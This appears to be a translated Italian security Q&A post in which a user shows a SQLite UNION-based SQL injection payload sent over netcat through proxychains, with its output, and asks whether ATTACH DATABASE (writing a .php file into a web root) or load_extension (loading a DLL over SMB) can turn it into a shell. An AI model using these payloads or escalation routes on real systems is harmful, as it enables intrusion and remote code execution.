Da SQL Injection in SQLite alla shell

0

Ho bisogno di ottenere una shell da un'iniezione SQL su un'applicazione con database SQLite.

Attualmente il mio exploit ha il seguente aspetto:

lucian@0x90:~/$ proxychains nc 10.185.10.55 1101
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:9999-<><>-10.185.10.55:1101-<><>-OK
Input please:
1 UNION ALL SELECT 42,'qvzbq'||'LOHpyNMpQSCCIaWebmCZHjvwrZhYczWfJGiXVBzV'||'qzzxq',42;-- sdasdasd
1 UNION ALL SELECT 42,'qvzbq'||'LOHpyNMpQSCCIaWebmCZHjvwrZhYczWfJGiXVBzV'||'qzzxq',42;-- sdasdasd

Parsing results... 
Customer information: Damy Roali qvzbqLOHpyNMpQSCCIaWebmCZHjvwrZhYczWfJGiXVBzVqzzxq 42 


lucian@0x90:~/$ 

Seguendo questo link link ho scoperto che posso ATTACCARE DATABASE (creando un file .php nella radice del documento di una cartella web) o load_extension (caricando un file dll da un percorso smb) per ottenere la shell.

È di default in SQLite o devo abilitare qualcosa o controllare qualcosa?

    
posta Lucian Nitescu 07.08.2018 - 16:18
fonte

0 risposte

Leggi altre domande sui tag